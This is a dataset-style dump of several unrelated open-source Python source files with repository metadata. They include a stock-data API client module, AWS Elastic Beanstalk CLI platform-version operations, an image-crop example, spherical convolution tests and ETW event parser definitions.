max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
shorttext/metrics/embedfuzzy/__init__.py
|
vishalbelsare/PyShortTextCategorization
| 481 |
115345
|
<gh_stars>100-1000
from .jaccard import jaccardscore_sents
|
llvm/utils/lit/tests/lld-features.py
|
mkinsner/llvm
| 2,338 |
115354
|
<reponame>mkinsner/llvm<filename>llvm/utils/lit/tests/lld-features.py
## Show that each of the LLD variants detected by use_lld comes with its own
## feature.
# RUN: %{lit} %{inputs}/lld-features 2>&1 | FileCheck %s -DDIR=%p
# CHECK: Passed: 4
|
pyEX/platform/platform.py
|
vishalbelsare/pyEX
| 107 |
115379
|
# *****************************************************************************
#
# Copyright (c) 2021, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
from functools import wraps
import json
import pandas as pd
from ..common import (
PyEXception,
_interpolateDatatype,
_dateRange,
_get,
_getAsync,
_patch,
_patchAsync,
_post,
_postAsync,
_put,
_putAsync,
_delete,
_deleteAsync,
_quoteSymbols,
_strOrDate,
)
def _queryURL(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
offset=0,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
transforms=None,
basePath="query",
**extra_params,
):
base_url = basePath
if provider:
base_url += "/{}".format(provider)
if provider and id:
base_url += "/{}".format(_quoteSymbols(id))
if provider and id and key:
base_url += "/{}".format(_quoteSymbols(key))
if provider and id and key and subkey:
base_url += "/{}".format(_quoteSymbols(subkey))
base_url += "?"
if provider and id:
if range:
base_url += "range={}&".format(_dateRange(range))
if calendar:
base_url += "calendar={}&".format(str(calendar))
if limit and not last and (not from_ or not to_):
base_url += "limit={}&".format(str(limit))
if offset > 0:
base_url += "offset={}&".format(offset)
if subattribute:
if isinstance(subattribute, dict):
# dict mapping key to required equal value, e.g. {"A": 1} -> A|1
subattribute = ",".join(
"{}|{}".format(key, value) for key, value in subattribute.items()
)
elif isinstance(subattribute, list):
# list of tuples mapping key to required equal value, e.g. [("A", "=", 1), ("B", "!=", 2)] -> A|1,B~2
subattribute = ",".join(
"{}{}{}".format(v1, "|" if v2.upper() == "=" else "~", v3)
for v1, v2, v3 in subattribute
)
base_url += "subattribute={}&".format(subattribute)
if dateField:
base_url += "dateField={}&".format(dateField)
if from_:
base_url += "from={}&".format(_strOrDate(from_))
if to_:
base_url += "to={}&".format(_strOrDate(to_))
if on:
base_url += "on={}&".format(_strOrDate(on))
if last:
base_url += "last={}&".format(str(last))
if first:
base_url += "first={}&".format(str(first))
if sort:
if sort.lower() not in (
"asc",
"desc",
):
raise PyEXception("Sort must be in (asc, desc), got: {}".format(sort))
base_url += "sort={}&".format(sort)
if interval:
base_url += "interval={}&".format(int(interval))
if transforms:
base_url += "transforms={}&".format(json.dumps(transforms or []))
if extra_params:
base_url += "&".join("{}={}".format(k, v) for k, v in extra_params.items())
return base_url
def _queryMetaUrl(provider="", id="", key="", subkey=""):
url = "meta"
if provider:
url += "/{}".format(provider)
if not id and key:
id = "*"
if id:
url += "/{}".format(id)
if key:
url += "/{}".format(key)
if subkey:
url += "/{}".format(subkey)
return url
def queryMeta(
provider="",
id="",
key="",
subkey="",
token="",
version="stable",
filter="",
format="json",
):
return _get(
_queryMetaUrl(provider=provider, id=id, key=key, subkey=subkey),
token=token,
version=version,
filter=filter,
format=format,
)
async def queryMetaAsync(
provider="",
id="",
key="",
subkey="",
token="",
version="stable",
filter="",
format="json",
):
return await _getAsync(
_queryMetaUrl(provider=provider, id=id, key=key, subkey=subkey),
token=token,
version=version,
filter=filter,
format=format,
)
@wraps(queryMeta)
def queryMetaDF(*args, **kwargs):
return pd.DataFrame(queryMeta(*args, **kwargs))
def query(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
transforms=None,
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
transforms=transforms,
**extra_params,
)
return _get(base_url, token=token, version=version, filter=filter, format=format)
@wraps(query)
def queryDF(*args, **kwargs):
return pd.DataFrame(query(*args, **kwargs))
async def queryAsync(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
transforms=None,
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
transforms=transforms,
**extra_params,
)
return await _getAsync(
base_url, token=token, version=version, filter=filter, format=format
)
def listJobs(
provider,
type="ingest",
jobId="",
token="",
version="stable",
filter="",
format="json",
):
url = "jobs/{}/{}".format(provider, type)
if jobId:
url += "/{}".format(jobId)
return _get(url=url, token=token, version=version, filter=filter, format=format)
def listDatasets(
provider="CORE", id="", token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id)
return _get(
url=base_url, token=token, version=version, filter=filter, format=format
)
@wraps(listDatasets)
def listDatasetsDF(*args, **kwargs):
return pd.DataFrame(listDatasets(*args, **kwargs))
async def listDatasetsAsync(
provider="CORE", id="", token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id)
return await _getAsync(
url=base_url, token=token, version=version, filter=filter, format=format
)
def createDataset(
provider, id="", schema=None, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, limit=None, basePath="datasets")
# TODO schema validation
return _post(
url=base_url,
json=schema,
token=token,
version=version,
token_in_params=True,
format=format,
)
async def createDatasetAsync(
provider, id="", schema=None, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
# TODO schema validation
return await _postAsync(
url=base_url,
json=schema,
token=token,
version=version,
token_in_params=True,
format=format,
)
def loadData(
provider,
id,
data,
dataType="",
token="",
version="stable",
filter="",
format="json",
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
# data interpolation
if not dataType:
data, headers = _interpolateDatatype(data)
else:
headers = {"content-type": dataType}
# TODO schema validation
return _put(
url=base_url,
data=data,
token=token,
version=version,
filter=filter,
format=format,
token_in_params=True,
headers=headers,
)
async def loadDataAsync(
provider, id, data, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
# TODO schema validation
return await _putAsync(
url=base_url,
data=data,
token=token,
version=version,
token_in_params=True,
format=format,
)
def modifyDataset(
provider, id, schema, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
return _patch(
url=base_url,
json=schema,
token=token,
version=version,
token_in_params=True,
format=format,
)
async def modifyDatasetAsync(
provider, id, schema, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
return await _patchAsync(
url=base_url,
json=schema,
token=token,
version=version,
token_in_params=True,
format=format,
)
def modifyData(
transforms=None,
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
basePath="datasets",
**extra_params,
)
return _patch(
url=base_url,
json=transforms,
token=token,
version=version,
token_in_params=True,
format=format,
)
async def modifyDataAsync(
transforms=None,
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
basePath="datasets",
**extra_params,
)
return await _patchAsync(
url=base_url,
json=transforms,
token=token,
version=version,
token_in_params=True,
format=format,
)
def deleteData(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
basePath="datasets",
**extra_params,
)
return _delete(
url=base_url, token=token, version=version, filter=filter, format=format
)
async def deleteDataAsync(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
basePath="datasets",
**extra_params,
)
return await _deleteAsync(
url=base_url, token=token, version=version, filter=filter, format=format
)
def deleteDataset(
provider="CORE",
id="",
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
limit=None,
basePath="datasets",
)
return _delete(
url=base_url, token=token, version=version, filter=filter, format=format
)
async def deleteDatasetAsync(
provider="CORE",
id="",
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
limit=None,
basePath="datasets",
)
return await _deleteAsync(
url=base_url, token=token, version=version, filter=filter, format=format
)
|
pil_pillow__examples/crop.py
|
DazEB2/SimplePyScripts
| 117 |
115412
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# pip install Pillow
from PIL import Image
image_file = "blur/input.jpg"
img = Image.open(image_file)
cropped_img = img.crop((175, 42, 336, 170))
cropped_img.show()
|
ebcli/operations/platform_version_ops.py
|
sdolenc/aws-elastic-beanstalk-cli
| 110 |
115542
|
<filename>ebcli/operations/platform_version_ops.py
# Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from datetime import datetime
import os
import sys
import tempfile
from shutil import copyfile, move
import threading
import yaml
from semantic_version import Version
from termcolor import colored
from ebcli.core import io, fileoperations
from ebcli.core.ebglobals import Constants
from ebcli.lib import elasticbeanstalk, heuristics, s3
from ebcli.objects import api_filters
from ebcli.objects.exceptions import (
InvalidPlatformVersionError,
NotFoundError,
PlatformWorkspaceEmptyError,
ValidationError,
)
from ebcli.objects.platform import PlatformBranch, PlatformVersion
from ebcli.objects.sourcecontrol import SourceControl
from ebcli.operations import commonops, logsops
from ebcli.operations.tagops import tagops
from ebcli.resources.statics import namespaces, option_names
from ebcli.resources.strings import alerts, strings, prompts
from ebcli.resources.regex import PackerRegExpressions, PlatformRegExpressions
class PackerStreamMessage(object):
def __init__(self, event):
self.event = event
def raw_message(self):
event = self.event
if isinstance(event, bytes):
event = event.decode('utf-8')
matches = PackerRegExpressions.LOG_MESSAGE_REGEX.search(event)
return matches.groups(0)[0] if matches else None
def message_severity(self):
matches = PackerRegExpressions.LOG_MESSAGE_SEVERITY_REGEX.search(self.event)
return matches.groups(0)[0] if matches else None
def format(self):
ui_message = self.ui_message()
if ui_message:
return ui_message
other_packer_message = self.other_packer_message()
if other_packer_message:
if sys.version_info < (3, 0):
other_packer_message = other_packer_message.encode('utf-8')
other_packer_message_target = self.other_packer_message_target()
formatted_other_message = '{}:{}'.format(
other_packer_message_target,
other_packer_message
)
if sys.version_info < (3, 0):
formatted_other_message = formatted_other_message.decode('utf-8')
return formatted_other_message
other_message = self.other_message()
if other_message:
return other_message
def ui_message(self):
return self.__return_match(PackerRegExpressions.PACKER_UI_MESSAGE_FORMAT_REGEX)
def other_packer_message(self):
return self.__return_match(PackerRegExpressions.PACKER_OTHER_MESSAGE_DATA_REGEX)
def other_packer_message_target(self):
return self.__return_match(PackerRegExpressions.PACKER_OTHER_MESSAGE_TARGET_REGEX)
def other_message(self):
return self.__return_match(PackerRegExpressions.OTHER_FORMAT_REGEX)
def __return_match(self, regex):
raw_message = self.raw_message()
if not raw_message:
return
if isinstance(raw_message, bytes):
raw_message = raw_message.decode('utf-8')
matches = regex.search(raw_message)
return matches.groups(0)[0].strip() if matches else None
class PackerStreamFormatter(object):
def format(self, message, stream_name=None):
packer_stream_message = PackerStreamMessage(message)
if packer_stream_message.raw_message():
formatted_message = packer_stream_message.format()
else:
formatted_message = '{0} {1}'.format(stream_name, message)
return formatted_message
def create_platform_version(
version,
major_increment,
minor_increment,
patch_increment,
instance_type,
vpc=None,
staged=False,
timeout=None,
tags=None,
):
_raise_if_directory_is_empty()
_raise_if_platform_definition_file_is_missing()
version and _raise_if_version_format_is_invalid(version)
platform_name = fileoperations.get_platform_name()
instance_profile = fileoperations.get_instance_profile(None)
key_name = commonops.get_default_keyname()
version = version or _resolve_version_number(
platform_name,
major_increment,
minor_increment,
patch_increment
)
tags = tagops.get_and_validate_tags(tags)
source_control = SourceControl.get_source_control()
io.log_warning(strings['sc.unstagedchanges']) if source_control.untracked_changes_exist() else None
version_label = _resolve_version_label(source_control, staged)
bucket, key, file_path = _resolve_s3_bucket_and_key(platform_name, version_label, source_control, staged)
_upload_platform_version_to_s3_if_necessary(bucket, key, file_path)
io.log_info('Creating Platform Version ' + version_label)
response = elasticbeanstalk.create_platform_version(
platform_name, version, bucket, key, instance_profile, key_name, instance_type, tags, vpc)
environment_name = 'eb-custom-platform-builder-packer'
io.echo(colored(
strings['platformbuildercreation.info'].format(environment_name), attrs=['reverse']))
fileoperations.update_platform_version(version)
commonops.set_environment_for_current_branch(environment_name)
stream_platform_logs(response, platform_name, version, timeout)
def delete_platform_version(platform_version, force=False):
arn = version_to_arn(platform_version)
if not force:
io.echo(prompts['platformdelete.confirm'].replace('{platform-arn}', arn))
io.validate_action(prompts['platformdelete.validate'], arn)
environments = []
try:
environments = [env for env in elasticbeanstalk.get_environments() if env.platform.version == arn]
except NotFoundError:
pass
if len(environments) > 0:
_, platform_name, platform_version = PlatformVersion.arn_to_platform(arn)
raise ValidationError(strings['platformdeletevalidation.error'].format(
platform_name,
platform_version,
'\n '.join([env.name for env in environments])
))
response = elasticbeanstalk.delete_platform(arn)
request_id = response['ResponseMetadata']['RequestId']
timeout = 10
commonops.wait_for_success_events(request_id, timeout_in_minutes=timeout, platform_arn=arn)
def describe_custom_platform_version(
owner=None,
platform_arn=None,
platform_name=None,
platform_version=None,
status=None
):
if not platform_arn:
platforms = list_custom_platform_versions(
platform_name=platform_name,
platform_version=platform_version,
status=status
)
platform_arn = platforms[0]
return elasticbeanstalk.describe_platform_version(platform_arn)
def find_custom_platform_version_from_string(solution_string):
available_custom_platforms = list_custom_platform_versions()
for custom_platform_matcher in [
PlatformVersion.match_with_complete_arn,
PlatformVersion.match_with_platform_name,
]:
matched_custom_platform = custom_platform_matcher(available_custom_platforms, solution_string)
if matched_custom_platform:
return matched_custom_platform
def get_latest_custom_platform_version(platform):
"""
:param platform: A custom platform ARN or a custom platform name
:return: A PlatformVersion object representing the latest version of `platform`
"""
account_id, platform_name, platform_version = PlatformVersion.arn_to_platform(platform)
if account_id:
matching_platforms = list_custom_platform_versions(
platform_name=platform_name,
status='Ready'
)
if matching_platforms:
return PlatformVersion(matching_platforms[0])
def get_latest_eb_managed_platform(platform_arn):
account_id, platform_name, platform_version = PlatformVersion.arn_to_platform(platform_arn)
if not account_id:
matching_platforms = list_eb_managed_platform_versions(
platform_name=platform_name,
status='Ready'
)
if matching_platforms:
return PlatformVersion(matching_platforms[0])
def get_latest_platform_version(platform_name=None, owner=None, ignored_states=None):
if ignored_states is None:
ignored_states = ['Deleting', 'Failed']
platforms = get_platforms(
platform_name=platform_name,
ignored_states=ignored_states,
owner=owner,
platform_version="latest"
)
try:
return platforms[platform_name]
except KeyError:
return None
def get_platforms(platform_name=None, ignored_states=None, owner=None, platform_version=None):
platform_list = list_custom_platform_versions(
platform_name=platform_name,
platform_version=platform_version
)
platforms = dict()
for platform in platform_list:
if ignored_states and platform['PlatformStatus'] in ignored_states:
continue
_, platform_name, platform_version = PlatformVersion.arn_to_platform(platform)
platforms[platform_name] = platform_version
return platforms
def get_platform_arn(platform_name, platform_version, owner=None):
platform = describe_custom_platform_version(
platform_name=platform_name,
platform_version=platform_version,
owner=owner
)
if platform:
return platform['PlatformArn']
def get_platform_versions_for_branch(branch_name, recommended_only=False):
filters = [
{
'Type': 'PlatformBranchName',
'Operator': '=',
'Values': [branch_name],
}
]
if recommended_only:
filters.append({
'Type': 'PlatformLifecycleState',
'Operator': '=',
'Values': ['Recommended'],
})
platform_version_summaries = elasticbeanstalk.list_platform_versions(
filters=filters)
return [
PlatformVersion.from_platform_version_summary(summary)
for summary in platform_version_summaries]
def get_preferred_platform_version_for_branch(branch_name):
"""
Gets the latest recommended platform version for a platform branch. If no
platform versions are recommended it retreives the latest.
"""
matched_versions = get_platform_versions_for_branch(branch_name)
matched_versions = list(sorted(
matched_versions,
key=lambda x: x.sortable_version,
reverse=True))
recommended_versions = [
version for version in matched_versions if version.is_recommended]
if len(recommended_versions) > 0:
return recommended_versions[0]
elif len(matched_versions) > 0:
return matched_versions[0]
else:
raise NotFoundError(alerts['platform.invalidstring'].format(
branch_name))
def list_custom_platform_versions(
platform_name=None,
platform_version=None,
show_status=False,
status=None
):
filters = [api_filters.PlatformOwnerFilter(values=[Constants.OWNED_BY_SELF]).json()]
return list_platform_versions(filters, platform_name, platform_version, show_status, status)
def list_eb_managed_platform_versions(
platform_name=None,
platform_version=None,
show_status=False,
status=None
):
filters = [api_filters.PlatformOwnerFilter(values=['AWSElasticBeanstalk']).json()]
return list_platform_versions(filters, platform_name, platform_version, show_status, status)
def list_platform_versions(
filters,
platform_name=None,
platform_version=None,
show_status=False,
status=None
):
if platform_name:
filters.append(
api_filters.PlatformNameFilter(values=[platform_name]).json()
)
if platform_version:
filters.append(
api_filters.PlatformVersionFilter(values=[platform_version]).json()
)
if status:
filters.append(
api_filters.PlatformStatusFilter(values=[status]).json()
)
platforms_list = elasticbeanstalk.list_platform_versions(filters=filters)
return __formatted_platform_descriptions(platforms_list, show_status)
def stream_platform_logs(response, platform_name, version, timeout):
arn = response['PlatformSummary']['PlatformArn']
request_id = response['ResponseMetadata']['RequestId']
streamer = io.get_event_streamer()
builder_events = threading.Thread(
target=logsops.stream_platform_logs,
args=(platform_name, version, streamer, 5, None, PackerStreamFormatter()))
builder_events.daemon = True
builder_events.start()
commonops.wait_for_success_events(
request_id,
platform_arn=arn,
streamer=streamer,
timeout_in_minutes=timeout or 30
)
def version_to_arn(platform_version):
platform_name = fileoperations.get_platform_name()
arn = None
if PlatformRegExpressions.VALID_PLATFORM_VERSION_FORMAT.match(platform_version):
arn = get_platform_arn(platform_name, platform_version, owner=Constants.OWNED_BY_SELF)
elif PlatformVersion.is_valid_arn(platform_version):
arn = platform_version
elif PlatformRegExpressions.VALID_PLATFORM_SHORT_FORMAT.match(platform_version):
match = PlatformRegExpressions.VALID_PLATFORM_SHORT_FORMAT.match(platform_version)
platform_name, platform_version = match.group(1, 2)
arn = get_platform_arn(platform_name, platform_version, owner=Constants.OWNED_BY_SELF)
if not arn:
raise InvalidPlatformVersionError(strings['exit.nosuchplatformversion'])
return arn
def _create_app_version_zip_if_not_present_on_s3(
platform_name,
version_label,
source_control,
staged
):
s3_bucket, s3_key = commonops.get_app_version_s3_location(platform_name, version_label)
file_name, file_path = None, None
if s3_bucket is None and s3_key is None:
file_name, file_path = commonops._zip_up_project(version_label, source_control, staged=staged)
s3_bucket = elasticbeanstalk.get_storage_location()
s3_key = platform_name + '/' + file_name
return s3_bucket, s3_key, file_path
def _datetime_now():
return datetime.now()
def _enable_healthd():
option_settings = []
option_settings.append({
'namespace': namespaces.HEALTH_SYSTEM,
'option_name': option_names.SYSTEM_TYPE,
'value': 'enhanced'
})
option_settings.append({
'namespace': namespaces.ENVIRONMENT,
'option_name': option_names.SERVICE_ROLE,
'value': 'aws-elasticbeanstalk-service-role'
})
fileoperations.ProjectRoot.traverse()
with open('platform.yaml', 'r') as stream:
platform_yaml = yaml.safe_load(stream)
try:
platform_options = platform_yaml['option_settings']
except KeyError:
platform_options = []
options_to_inject = []
for option in option_settings:
found_option = False
for platform_option in platform_options:
if option['namespace'] == (
platform_option['namespace']
and option['option_name'] == platform_option['option_name']
):
found_option = True
break
if not found_option:
options_to_inject.append(option)
platform_options.extend(options_to_inject)
platform_yaml['option_settings'] = list(platform_options)
with open('platform.yaml', 'w') as stream:
stream.write(yaml.dump(platform_yaml, default_flow_style=False))
def _generate_platform_yaml_copy():
file_descriptor, original_platform_yaml = tempfile.mkstemp()
os.close(file_descriptor)
copyfile('platform.yaml', original_platform_yaml)
return original_platform_yaml
def _raise_if_directory_is_empty():
cwd = os.getcwd()
fileoperations.ProjectRoot.traverse()
try:
if heuristics.directory_is_empty():
raise PlatformWorkspaceEmptyError(strings['exit.platformworkspaceempty'])
finally:
os.chdir(cwd)
def _raise_if_platform_definition_file_is_missing():
if not heuristics.has_platform_definition_file():
raise PlatformWorkspaceEmptyError(strings['exit.no_pdf_file'])
def _raise_if_version_format_is_invalid(version):
if not PlatformRegExpressions.VALID_PLATFORM_VERSION_FORMAT.match(version):
raise InvalidPlatformVersionError(strings['exit.invalidversion'])
def _resolve_s3_bucket_and_key(
platform_name,
version_label,
source_control,
staged
):
platform_yaml_copy = _generate_platform_yaml_copy()
try:
_enable_healthd()
s3_bucket, s3_key, file_path = _create_app_version_zip_if_not_present_on_s3(
platform_name,
version_label,
source_control,
staged
)
finally:
move(platform_yaml_copy, 'platform.yaml')
return s3_bucket, s3_key, file_path
def _resolve_version_label(source_control, staged):
version_label = source_control.get_version_label()
if staged:
timestamp = _datetime_now().strftime("%y%m%d_%H%M%S")
version_label = version_label + '-stage-' + timestamp
return version_label
def _resolve_version_number(
platform_name,
major_increment,
minor_increment,
patch_increment
):
version = get_latest_platform_version(
platform_name=platform_name,
owner=Constants.OWNED_BY_SELF,
ignored_states=[]
)
if version is None:
version = '1.0.0'
else:
major, minor, patch = version.split('.', 3)
if major_increment:
major = str(int(major) + 1)
minor = '0'
patch = '0'
if minor_increment:
minor = str(int(minor) + 1)
patch = '0'
if patch_increment or not(major_increment or minor_increment):
patch = str(int(patch) + 1)
version = "%s.%s.%s" % (major, minor, patch)
return version
def __formatted_platform_descriptions(platforms_list, show_status):
platform_tuples = []
for platform in platforms_list:
platform_tuples.append(
{
'PlatformArn': platform['PlatformArn'],
'PlatformStatus': platform['PlatformStatus']
}
)
platform_tuples.sort(
key=lambda platform_tuple: (
PlatformVersion.get_platform_name(platform_tuple['PlatformArn']),
Version(PlatformVersion.get_platform_version(platform_tuple['PlatformArn']))
),
reverse=True
)
formatted_platform_descriptions = []
for index, platform_tuple in enumerate(platform_tuples):
if show_status:
formatted_platform_description = '{platform_arn} Status: {platform_status}'.format(
platform_arn=platform_tuple['PlatformArn'],
platform_status=platform_tuple['PlatformStatus']
)
else:
formatted_platform_description = platform_tuple['PlatformArn']
formatted_platform_descriptions.append(formatted_platform_description)
return formatted_platform_descriptions
def _upload_platform_version_to_s3_if_necessary(bucket, key, file_path):
try:
s3.get_object_info(bucket, key)
io.log_info('S3 Object already exists. Skipping upload.')
except NotFoundError:
io.log_info('Uploading archive to s3 location: ' + key)
s3.upload_platform_version(bucket, key, file_path)
fileoperations.delete_app_versions()
|
tests/spectral/test_S2_conv.py
|
machism0/lie_learn
| 140 |
115560
|
<reponame>machism0/lie_learn<filename>tests/spectral/test_S2_conv.py
import numpy as np
import lie_learn.spaces.S2 as S2
import lie_learn.spaces.S3 as S3
import lie_learn.groups.SO3 as SO3
from lie_learn.representations.SO3.spherical_harmonics import sh
from lie_learn.spectral.S2_conv import naive_S2_conv, spectral_S2_conv, naive_S2_conv_v2
def compare_naive_and_spectral_conv():
f1 = lambda t, p: sh(l=2, m=1, theta=t, phi=p, field='real', normalization='quantum', condon_shortley=True)
f2 = lambda t, p: sh(l=2, m=1, theta=t, phi=p, field='real', normalization='quantum', condon_shortley=True)
theta, phi = S2.meshgrid(b=4, grid_type='Gauss-Legendre')
f1_grid = f1(theta, phi)
f2_grid = f2(theta, phi)
alpha, beta, gamma = S3.meshgrid(b=4, grid_type='SOFT') # TODO check convention
f12_grid_spectral = spectral_S2_conv(f1_grid, f2_grid, s2_fft=None, so3_fft=None)
f12_grid = np.zeros_like(alpha)
for i in range(alpha.shape[0]):
for j in range(alpha.shape[1]):
for k in range(alpha.shape[2]):
f12_grid[i, j, k] = naive_S2_conv(f1, f2, alpha[i, j, k], beta[i, j, k], gamma[i, j, k])
print(i, j, k, f12_grid[i, j, k])
return f1_grid, f2_grid, f12_grid, f12_grid_spectral
def naive_conv(l1=1, m1=1, l2=1, m2=1, g_parameterization='EA313'):
f1 = lambda t, p: sh(l=l1, m=m1, theta=t, phi=p, field='real', normalization='quantum', condon_shortley=True)
f2 = lambda t, p: sh(l=l2, m=m2, theta=t, phi=p, field='real', normalization='quantum', condon_shortley=True)
theta, phi = S2.meshgrid(b=3, grid_type='Gauss-Legendre')
f1_grid = f1(theta, phi)
f2_grid = f2(theta, phi)
alpha, beta, gamma = S3.meshgrid(b=3, grid_type='SOFT') # TODO check convention
f12_grid = np.zeros_like(alpha)
for i in range(alpha.shape[0]):
for j in range(alpha.shape[1]):
for k in range(alpha.shape[2]):
f12_grid[i, j, k] = naive_S2_conv_v2(f1, f2, alpha[i, j, k], beta[i, j, k], gamma[i, j, k], g_parameterization)
print(i, j, k, f12_grid[i, j, k])
return f1_grid, f2_grid, f12_grid
|
etl/parsers/etw/HidEventFilter.py
|
IMULMUL/etl-parser
| 104 |
115564
|
<reponame>IMULMUL/etl-parser
# -*- coding: utf-8 -*-
"""
HidEventFilter
GUID : dde50426-fa77-4088-8e0c-f2f553fb6843
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=100, version=1)
class HidEventFilter_100_1(Etw):
pattern = Struct(
"Message" / WString
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=101, version=1)
class HidEventFilter_101_1(Etw):
pattern = Struct(
"Message" / WString
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=102, version=1)
class HidEventFilter_102_1(Etw):
pattern = Struct(
"Message" / WString,
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=103, version=1)
class HidEventFilter_103_1(Etw):
pattern = Struct(
"FunctionName" / WString
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=104, version=1)
class HidEventFilter_104_1(Etw):
pattern = Struct(
"FunctionName" / WString,
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=105, version=1)
class HidEventFilter_105_1(Etw):
pattern = Struct(
"Device" / Int64ul,
"DeviceInit" / Int64ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=106, version=1)
class HidEventFilter_106_1(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=107, version=1)
class HidEventFilter_107_1(Etw):
pattern = Struct(
"Device" / Int64ul,
"PreviousState" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=108, version=1)
class HidEventFilter_108_1(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=109, version=1)
class HidEventFilter_109_1(Etw):
pattern = Struct(
"WDFDEVICE" / Int64ul,
"TargetState" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=110, version=1)
class HidEventFilter_110_1(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=111, version=1)
class HidEventFilter_111_1(Etw):
pattern = Struct(
"Message" / WString,
"FeatureDataValue" / Int32ul
)
